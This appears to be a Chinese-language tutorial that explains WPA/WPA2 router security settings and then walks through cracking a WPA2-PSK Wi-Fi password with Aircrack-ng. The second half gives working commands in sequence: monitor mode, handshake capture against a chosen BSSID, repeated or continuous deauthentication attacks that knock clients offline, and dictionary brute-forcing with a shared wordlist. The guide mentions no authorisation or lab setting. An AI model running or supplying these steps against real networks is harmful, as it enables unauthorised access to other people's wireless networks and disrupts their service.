WPA/WPA2
WPA/WPA2是一种比WEP强壮的加密算法,选择这种安全类型,路由器将采用Radius服务器进行身份认证并获取密钥的WPA或WPA2安全形式。由于需要建立专用认证服务器,成本昂贵且配置复杂,因此不推荐不同用户使用此安全类型。
WPA-PSK/WPA2-PSK
WPA-PSK/WPA2-PSK安全类型实际上是WPA/WPA2的简化版本,基于共享密钥的WPA形式,安全性高且设置相对简单,适合家庭用户和小型企业使用。
详细设置
- 认证类型:选择系统采用的安全形式,即Enterprise、WPA-PSK、WPA2-PSK。
- 加密算法:选择对无线数据进行加密的安全算法,选项包括Enterprise、TKIP、AES。默认选项为Enterprise,选择后,路由器将根据需求选择TKIP或AES加密方法。注意11N模式不支持TKIP算法。
- PSK密码:即WPA-PSK/WPA2-PSK的初始密钥,在设置时,需要8-63个ASCII字符或8-64个十六进制字符。
- 组密钥更新周期:设置广播和组播密钥的定时更新,以秒为单位,最小值为30,若值为0表示不进行更新。
使用Aircrack-ng抓取WPA2-PSK握手包
主要步骤
- 设置无线网卡至监听模式:
airmon-ng start wlan0
- 扫描周围WPA2-PSK加密的无线信号:
airodump-ng wlan0mon
- 新建一个终端,抓取握手包:
airodump-ng -c [num] -w wpa2 wlan0mon
(需要指定信道) - 在等待过程中,发起DeAuth攻击,强制将客户端踢下线重连,抓取握手包:
aireplay-ng -0 5 -a BSSID -c STATION wlan0mon
(设置为发起5次攻击)
如果想要持续发起攻击,可以使用以下命令:aireplay-ng -0 0 -a BSSID -c STATION wlan0mon
现在需要让虚拟机连接网卡。连接成功后,输入ifconfig
会看到,然后输入airmon-ng start wlan0
成功后,开始监听(扫描周围的无线信号)。在过程中,信道为CN,使用以下命令抓取目标的握手包:airodump-ng -c 信道 --bssid xxx -w 保存路径 wlan0mon
。
强制将客户端踢下线:aireplay-ng -0 0 -a 目标的MAC地址 -c 目标客户端MAC wlan0mon
。开始进行攻击,但有时候该命令会报错。这是因为网卡会随机使用信道,多尝试几次同样的命令直到成功为止。
如图所示就证明抓到了握手包。开始破解密码,执行以下命令。最后使用好的字典进行爆破,字典链接如下:点击这里 提取码: zpdr。
aircrack-ng -w 字典 保存的包
aircrack-ng -w
后面都是绝对路径。